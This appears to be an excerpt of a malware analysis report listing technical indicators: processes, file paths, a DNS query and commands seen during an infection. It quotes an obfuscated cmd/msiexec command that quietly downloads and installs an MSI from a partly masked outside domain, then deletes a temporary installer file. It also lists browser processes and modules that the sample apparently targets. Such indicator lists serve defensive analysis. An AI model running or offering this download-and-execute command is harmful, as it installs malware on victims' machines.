Technical Information
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://un####slashclub.com/jss/binn.msi /qn
- %WINDIR%\explorer.exe
- iexplore.exe
- firefox.exe process, nss3.dll module
- %WINDIR%\installer\msid3a1.tmp
- http://un####slashclub.com/jss/binn.msi
- DNS ASK un####slashclub.com
- '%WINDIR%\installer\msid3a1.tmp'
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://un####slashclub.com/jss/binn.msi /qn' (with hidden window)
- '<SYSTEM32>\msiexec.exe' /i http://un####slashclub.com/jss/binn.msi /qn
- '%WINDIR%\syswow64\cmd.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\Installer\MSID3A1.tmp"